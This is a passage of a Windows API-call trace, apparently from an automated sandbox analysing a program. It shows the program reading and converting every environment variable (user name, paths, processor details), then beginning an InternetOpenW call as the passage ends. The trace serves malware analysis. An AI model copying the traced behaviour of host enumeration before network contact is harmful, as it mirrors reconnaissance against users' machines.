| out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.490] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xd) returned 0x6cec40 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x6cec40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0103.490] GetLastError () returned 0x0 [0103.490] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d12a8, Size=0x28) returned 0x6d12a8 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0103.490] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x25) returned 0x6caeb8 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x6caeb8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0103.490] GetLastError () returned 0x0 [0103.490] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d12a8, Size=0x2c) returned 0x6d12a8 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0103.490] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x39) returned 0x6c5c78 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x6c5c78, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0103.490] GetLastError () returned 0x0 [0103.490] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d12a8, Size=0x30) returned 0x6d12a8 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0103.490] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x18) returned 0x6d12e0 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6d12e0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0103.490] GetLastError () returned 0x0 [0103.490] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d12a8, Size=0x34) returned 0x6d1300 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0103.490] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x17) returned 0x6d12a8 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x6d12a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0103.490] GetLastError () returned 0x0 [0103.490] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1300, Size=0x38) returned 0x6d1300 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0103.490] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xe) returned 0x6cec58 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x6cec58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0103.490] GetLastError () returned 0x0 [0103.490] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1300, Size=0x3c) returned 0x6d1300 [0103.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0103.490] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x69) returned 0x6d1348 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x6d1348, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0103.491] GetLastError () returned 0x0 [0103.491] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1300, Size=0x40) returned 0x6d1300 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0103.491] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x3e) returned 0x6c5cc0 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x6c5cc0, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0103.491] GetLastError () returned 0x0 [0103.491] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1300, Size=0x44) returned 0x6d13c0 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0103.491] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1b) returned 0x6cf678 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x6cf678, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0103.491] GetLastError () returned 0x0 [0103.491] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d13c0, Size=0x48) returned 0x6d13c0 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0103.491] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1d) returned 0x6cf6a0 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x6cf6a0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0103.491] GetLastError () returned 0x0 [0103.491] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d13c0, Size=0x4c) returned 0x6d13c0 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0103.491] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x48) returned 0x6c7058 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x6c7058, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0103.491] GetLastError () returned 0x0 [0103.491] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d13c0, Size=0x50) returned 0x6d13c0 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0103.491] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x12) returned 0x6d1300 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x6d1300, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0103.491] GetLastError () returned 0x0 [0103.491] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d13c0, Size=0x54) returned 0x6d13c0 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0103.491] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x18) returned 0x6d1320 [0103.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x6d1320, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0103.491] GetLastError () returned 0x0 [0103.492] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d13c0, Size=0x58) returned 0x6d13c0 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0103.492] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1b) returned 0x6cf6c8 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x6cf6c8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0103.492] GetLastError () returned 0x0 [0103.492] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d13c0, Size=0x5c) returned 0x6d13c0 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0103.492] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x24) returned 0x6caee8 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x6caee8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0103.492] GetLastError () returned 0x0 [0103.492] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d13c0, Size=0x60) returned 0x6d13c0 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0103.492] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x29) returned 0x6cb5c0 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x6cb5c0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0103.492] GetLastError () returned 0x0 [0103.492] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d13c0, Size=0x64) returned 0x6d13c0 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0103.492] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1e) returned 0x6cf6f0 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x6cf6f0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0103.492] GetLastError () returned 0x0 [0103.492] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d13c0, Size=0x68) returned 0x6d13c0 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0103.492] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x41) returned 0x6c70a8 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x6c70a8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0103.492] GetLastError () returned 0x0 [0103.492] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d13c0, Size=0x6c) returned 0x6d13c0 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0103.492] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x17) returned 0x6d1438 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x6d1438, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0103.492] GetLastError () returned 0x0 [0103.492] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d13c0, Size=0x70) returned 0x6d13c0 [0103.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0103.493] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xf) returned 0x6cec70 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x6cec70, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0103.493] GetLastError () returned 0x0 [0103.493] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d13c0, Size=0x74) returned 0x6d1458 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0103.493] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x16) returned 0x6d13c0 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x6d13c0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0103.493] GetLastError () returned 0x0 [0103.493] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1458, Size=0x78) returned 0x6d1458 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0103.493] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x2a) returned 0x6cb5f8 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x6cb5f8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0103.493] GetLastError () returned 0x0 [0103.493] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1458, Size=0x7c) returned 0x6d1458 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0103.493] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x29) returned 0x6cb630 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x6cb630, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0103.493] GetLastError () returned 0x0 [0103.493] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1458, Size=0x80) returned 0x6d1458 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0103.493] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x15) returned 0x6d13e0 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6d13e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0103.493] GetLastError () returned 0x0 [0103.493] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1458, Size=0x84) returned 0x6d1458 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0103.493] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1e) returned 0x6cf718 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x6cf718, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0103.493] GetLastError () returned 0x0 [0103.493] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1458, Size=0x88) returned 0x6d1458 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0103.493] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x2a) returned 0x6cb668 [0103.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x6cb668, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0103.494] GetLastError () returned 0x0 [0103.494] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1458, Size=0x8c) returned 0x6d1458 [0103.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0103.494] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x12) returned 0x6d1400 [0103.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x6d1400, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0103.494] GetLastError () returned 0x0 [0103.494] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1458, Size=0x90) returned 0x6d1458 [0103.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0103.494] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x18) returned 0x6d14f0 [0103.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x6d14f0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0103.494] GetLastError () returned 0x0 [0103.494] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1458, Size=0x94) returned 0x6d1510 [0103.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0103.494] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x46) returned 0x6c70f8 [0103.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x6c70f8, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0103.494] GetLastError () returned 0x0 [0103.494] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6d1510, Size=0x98) returned 0x6d1510 [0103.494] GetLastError () returned 0x0 [0103.500] InternetOpenW (lpszAgent="Microsoft Internet Explorer", 